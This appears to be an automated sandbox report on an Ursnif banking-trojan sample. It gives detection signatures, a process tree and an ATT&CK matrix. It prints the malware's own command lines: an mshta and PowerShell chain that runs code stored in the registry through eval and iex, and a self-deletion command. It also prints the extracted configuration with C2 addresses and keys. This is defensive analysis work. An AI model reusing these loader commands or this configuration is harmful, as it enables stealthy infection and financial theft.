Windows Analysis Report HxEWwh74qT
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 7080 cmdline: loaddll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
  - cmd.exe (PID: 7124 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
  - rundll32.exe (PID: 7148 cmdline: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  - control.exe (PID: 6020 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  - WerFault.exe (PID: 3380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  - WerFault.exe (PID: 6148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 604 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  - WerFault.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 612 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 6304 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  - powershell.exe (PID: 6932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
  - conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - csc.exe (PID: 6024 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  - cvtres.exe (PID: 6432 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD841.tmp" "c:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  - csc.exe (PID: 900 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  - cvtres.exe (PID: 5516 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESED31.tmp" "c:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  - explorer.exe (PID: 3808 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  - cmd.exe (PID: 3904 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  - conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - PING.EXE (PID: 6948 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  - RuntimeBroker.exe (PID: 4184 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  - cmd.exe (PID: 6652 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- cleanup
{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Rule | Description | Author |
---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
Rule | Description | Author |
---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype |
---|---|---|---|---|---|
04/22/22-15:27:17.806871 | 2033203 | 49775 | 80 | TCP | A Network Trojan was detected |
04/22/22-15:27:18.629540 | 2033203 | 49775 | 80 | TCP | A Network Trojan was detected |
04/22/22-15:26:57.401743 | 2033203 | 49771 | 80 | TCP | A Network Trojan was detected |
04/22/22-15:27:19.716505 | 2033204 | 49775 | 80 | TCP | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 3_2_04DE3072 |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Network Connect: | Jump to behavior |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 3_2_04DE4CC6 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value created / modified: |
Source: | Code function: | 3_2_04DE3072 |
System Summary |
---|
Source: | Matched rule: |
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Matched rule: |
Source: | Process created: |
Source: | Code function: | 3_2_04DE821C | |
Source: | Code function: | 3_2_04DE198A | |
Source: | Code function: | 3_2_04DE475F | |
Source: | Code function: | 20_2_000002DC00808C30 | |
Source: | Code function: | 20_2_000002DC00803B64 | |
Source: | Code function: | 20_2_000002DC007F8D20 | |
Source: | Code function: | 20_2_000002DC00816814 | |
Source: | Code function: | 20_2_000002DC0080F83C | |
Source: | Code function: | 20_2_000002DC0081A84C | |
Source: | Code function: | 20_2_000002DC0081B7AC | |
Source: | Code function: | 20_2_000002DC007F47E4 | |
Source: | Code function: | 20_2_000002DC0080B910 | |
Source: | Code function: | 20_2_000002DC00816138 | |
Source: | Code function: | 20_2_000002DC007F711C | |
Source: | Code function: | 20_2_000002DC00813248 | |
Source: | Code function: | 20_2_000002DC007FC96C | |
Source: | Code function: | 20_2_000002DC0081099C | |
Source: | Code function: | 20_2_000002DC0081C1CC | |
Source: | Code function: | 20_2_000002DC007FD2EC | |
Source: | Code function: | 20_2_000002DC0081833C | |
Source: | Code function: | 20_2_000002DC007F1338 | |
Source: | Code function: | 20_2_000002DC007F4338 | |
Source: | Code function: | 20_2_000002DC007FA2F8 | |
Source: | Code function: | 20_2_000002DC007F1AF4 | |
Source: | Code function: | 20_2_000002DC00816C40 | |
Source: | Code function: | 20_2_000002DC00808454 | |
Source: | Code function: | 20_2_000002DC007F4C54 | |
Source: | Code function: | 20_2_000002DC0080D36C | |
Source: | Code function: | 20_2_000002DC0081AB84 | |
Source: | Code function: | 20_2_000002DC007FDBAC | |
Source: | Code function: | 20_2_000002DC008043BC | |
Source: | Code function: | 20_2_000002DC00815BD4 | |
Source: | Code function: | 20_2_000002DC00818BD8 | |
Source: | Code function: | 20_2_000002DC0080FCEC | |
Source: | Code function: | 20_2_000002DC00800500 | |
Source: | Code function: | 20_2_000002DC00807D50 | |
Source: | Code function: | 20_2_000002DC007FE464 | |
Source: | Code function: | 20_2_000002DC0080DC8C | |
Source: | Code function: | 20_2_000002DC0081CCC4 | |
Source: | Code function: | 20_2_000002DC0080ADF0 | |
Source: | Code function: | 20_2_000002DC00817650 | |
Source: | Code function: | 20_2_000002DC0080E578 | |
Source: | Code function: | 20_2_000002DC00819708 | |
Source: | Code function: | 20_2_000002DC0080BF14 | |
Source: | Code function: | 20_2_000002DC00801678 | |
Source: | Code function: | 20_2_000002DC007F1F34 |
Source: | Code function: | 3_2_04DE3A9C | |
Source: | Code function: | 3_2_04DE4695 | |
Source: | Code function: | 3_2_04DE25D7 | |
Source: | Code function: | 3_2_04DE8441 | |
Source: | Code function: | 20_2_000002DC008010B4 | |
Source: | Code function: | 20_2_000002DC007F59D4 | |
Source: | Code function: | 20_2_000002DC007F79AC | |
Source: | Code function: | 20_2_000002DC007F2B58 | |
Source: | Code function: | 20_2_000002DC00817D48 | |
Source: | Code function: | 20_2_000002DC007F8D20 | |
Source: | Code function: | 20_2_000002DC00817DB4 |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: |
Source: | Code function: | 3_2_04DE6DB6 |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 3_2_04DEB301 | |
Source: | Code function: | 3_2_04DE821B | |
Source: | Code function: | 3_2_04DE7E29 | |
Source: | Code function: | 20_2_000002DC008253CA |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | Process created: | ||
Source: | Process created: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process token adjusted: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: |
Source: | Memory written: |
Source: | Memory protected: |
Source: | Memory allocated: |
Source: | Memory written: |
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | |||
Source: | Thread created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 3_2_04DE12D3 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 3_2_04DE5410 |
Source: | Code function: | 3_2_04DE515F |
Source: | Code function: | 3_2_04DE12D3 |
Stealing of Sensitive Information |
---|
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Windows Management Instrumentation | Path Interception | 812 Process Injection | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 2 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 Masquerading | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 31 Virtualization/Sandbox Evasion | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 812 Process Injection | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Rundll32 | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
